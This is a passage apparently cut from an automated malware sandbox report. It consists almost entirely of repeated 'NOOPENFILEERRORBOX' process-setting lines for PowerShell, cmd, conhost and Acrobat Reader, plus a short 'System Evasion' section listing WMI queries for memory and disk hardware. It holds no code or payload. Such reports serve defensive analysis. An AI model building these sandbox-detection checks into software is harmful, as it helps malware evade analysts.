        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
